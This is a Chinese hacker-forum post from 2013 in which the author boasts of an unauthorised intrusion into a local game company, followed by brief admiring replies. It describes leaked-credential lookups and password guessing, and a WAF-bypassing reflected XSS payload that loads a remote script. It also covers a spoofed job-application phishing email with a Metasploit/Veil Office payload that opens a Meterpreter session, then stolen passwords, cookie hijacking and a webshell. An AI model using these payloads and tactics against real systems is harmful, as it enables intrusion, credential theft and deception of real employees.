查看: 13070|回复: 5

针对当地某游戏公司的小型APT

[复制链接]
  • TA的每日心情
    奋斗
    2019-5-22 23:11
  • 签到天数: 14 天

    [LV.3]偶尔看看II

    发表于 2013-11-15 14:54:55 | 显示全部楼层 |阅读模式
    Author:redrain
    site:http://www.fuckgcd.net

    0×00背景

    这次APT应该算是一次很小的渗透,前后持续了可能两周左右(大概从我去西电比赛回来开始到现在),不过因为比较懒,所以截图也不多,主要是叙述事件

    目标是我这里本地的一家游戏公司,号称斥资5000w打造,加上去年我和小伙伴在这家公司领过1w的奖金,所以造成了我对目标公司”人傻钱多速来“的看法,后来因为有一个妹子在此公司上班,有天手贱发了个xss的截图给妹子,妹子顺手给了领导看,领导十分不屑:一个跨站而已,不碍事的。好吧,一个跨站而已=。=闲极无聊就搞搞呗

    废话扯完,以下正片

    (P.S在本人渗透完成到本文发出时,后门及shell已删)

    =====================================================


    0×01信息收集

    目标公司:XX网络科技有限公司(XX游戏)

    URL:http://www.xxxxcom.com

              http://www.xxxxcom.cn(公司另一域名)

              http://www.xxxxcom.cn.com(公司另一域名)

    通过浏览主站和查询whois信息,得知其公司工作邮箱,域名所有人信息,HR联系方式等

    1.png

    结合社工库查询,综合得到目标公司一高管信息

    工作邮箱直接查询到了密码,但是输入后提示密码错误,看来修改过,但仔细一看,均为有规律的弱口令

    三个数字重复或者是键盘向下的方式组合的口令,于是我果断的决定根据这个规律碰撞一下其他密码试试

    经过碰撞,把得到的密码丢到burpsuite重复提交到目标公司网站的登陆界面(本来想登录邮箱的,无奈网易有防止重复提交的策略)

    跑了好一阵子,未果,碰撞密码,暂时搁浅

    后来想起,whois信息中,域名是xinnet的,于是开心的去查询新网的裤子,不过查询结果很失望,密码依旧不对

    至此第一次试探搁浅



    0×02对目标网站的测试

    目标站点进行cms指纹识别后反应是良精南方的,但是看了看用的是.net的架构,想到去年和小伙伴领1w的原因就是因为发现该站点的漏洞,于是乎又折头看了看,shell已删除,并且管理后台重做过,去年是用的admin.xxxxcom.com做的后台,现在看了看已经重做,只能放弃,不过好在菜刀还有缓存,通过缓存浏览了web目录下的大概情况,有个bbs,一个前台,一个主站,均为.net架构,论坛更是Discuz!NT 3.6.711 出名的难日,浏览缓存后发现某目录下存在一富文本编辑器,访问后结果依旧不尽人意

    2.png

    果断放弃之,然后看了看去年找到的一个主站sql注入

    3.png

    装了新的安全狗,无力去继续绕过waf,放弃=。=

    唔,那怎么办呢,接下来就对目标站点进行了FUZZ扫描,哟~好吧,就只扫到我之前说的那个xss,还是反射型的,不过突然想到目标公司的人说不就是个跨站么,这句话让我又不开心了起来,哥今天就拿这个屌丝反射型跨站逆袭给你看!



    0×03反射型xss的逆袭之路(伪水坑攻击)

    因为装了安全狗,所以要稍微进行攻击代码构造绕过一下

    该反射构造的代码如下:

    http://www.xxxxcom.com/UserRegis ... lert%28/test/%29%3E


    4.png

    通过img标签构造iMg大小写的方式绕过,用onerror属性加载
    onerror=eval(javascript:document.write(unescape(‘ <script src=”http://xxx.js”></script>’));)


    [color=rgb(51, 102, 153) !important]复制代码

    对eval操纵的内容进行16进制编码后测试通过

    之后进行了第一次攻击尝试

    找到客服反馈问题,我说你们游戏的注册页面有问题啊,没办法注册,注册的地址是不是这个啊(然后发了经过短域名处理的攻击url)

    一般情况,客服都会来解决问题,但是该公司客服非常奇葩。。。说:哦,我也不知道啊,要不你下载个客户端去注册吧。

    经过我机智的对话,仍然没有让其点击连接(给客服大爷您跪了)

    第一次水坑攻击尝试失败。。暂时搁浅



    0×04第二次信息收集

    首次尝试接连受挫,我过了几天在群里打屁,正好那个在这家公司上班的妹子也在,我就顺口问了问公司的情况

    大概收集到信息为:

    公司员工办公电脑均为win7,文字处理软件有office和wps但是默认使用的是office,公司并没有规定统一

    不过好消息是office是默认的,以前看大牛们玩apt的时候都会很流弊的拿出office的漏洞通过邮件攻击搞定一切

    做了个简易的接收端,探测公司那边的组件和杀毒软件

    通过骗取点击后,接收端收到了session的信息,现在掌握的信息为:

    office版本为2007,浏览器为IE8,杀毒软件360,以及IP出口



    0×05最后的冲锋,反射型xss终于逆袭

    一切基本就绪,天随人愿的是我这里正好也有公网ip

    但是有360略蛋疼,不过上次听maple说veil比较牛逼,我office用的payload自然是来自鱼msf,那么就结合veil碰碰运气吧。。

    找了个fake-email发伪造邮件

    大概内容就是一篇求职的,附带了doc,doc里带了msf生成的

    为了保险起见,除了附件有doc外,我还在邮件内容里加了经过短域名处理的xss攻击连接

    邮件发过去了,一直开着msf等消息,不过貌似人家周日的时候不上班(这里是我的问题,APT基本上就做一次,不成功便成仁,好险差点因为时间的问题不成功)

    吓的我一直开着电脑,第二天大概十点过,msf这边有动静了,好吧,可以返回Meterpreter会话了,总算是摸到了目标公司的设备(尽管只是一台个人电脑)

    不过运气真不错,不知道是veil的原因免杀了360还是因为人品比较好当时对方360没有开,反正会话是反弹到了,快速的翻了翻对方的盘符,在文档里找到一份对应用户密码的记录,type了一下快速记录下来后把马删了撤退走人

    好消息一个接着一个,之前在邮件内容中写入的短域名xss也被触发了,果断用其cookie登录,不过比较可惜,因为是反射型,对方后台找不到,只登录了前台

    5.png

    通过前台并没有进入后台的地方,但是论坛和前台互通,所以,嘿嘿~~是个超级版主




    0×06尾声

    之后的事情就不用说了,shell到手,对应用户密码也在个人电脑上扒拉到,呵呵~

    6.png

    最后我溜达了一圈,把shell删了,走人,只为证明反射型xss也是可以屌丝逆袭高富帅的!

    写下这篇文章,默默抽根手边的花玉溪,深藏功与名


    回复

    使用道具 举报

  • TA的每日心情

    2024-12-14 22:22
  • 签到天数: 1631 天

    [LV.Master]伴坛终老

    发表于 2013-11-15 18:11:06 | 显示全部楼层
    我了个擦,xss  安全狗没拦截?
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    擦汗
    2017-6-6 13:33
  • 签到天数: 53 天

    [LV.5]常住居民I

    发表于 2013-11-15 22:56:19 | 显示全部楼层
    长见识了,嗯,给力
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    无聊
    2015-9-12 11:20
  • 签到天数: 1 天

    [LV.1]初来乍到

    发表于 2013-11-16 15:39:21 | 显示全部楼层
    默默的说我不会xss 呜呜
    回复 支持 反对

    使用道具 举报

    禽兽 该用户已被删除
    发表于 2013-11-17 01:54:13 | 显示全部楼层
    提示: 作者被禁止或删除 内容自动屏蔽
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2013-11-17 20:24:34 | 显示全部楼层
    深藏功与名
       我喜欢  哈哈
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-12-25 13:47 , Processed in 0.027794 second(s), 17 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部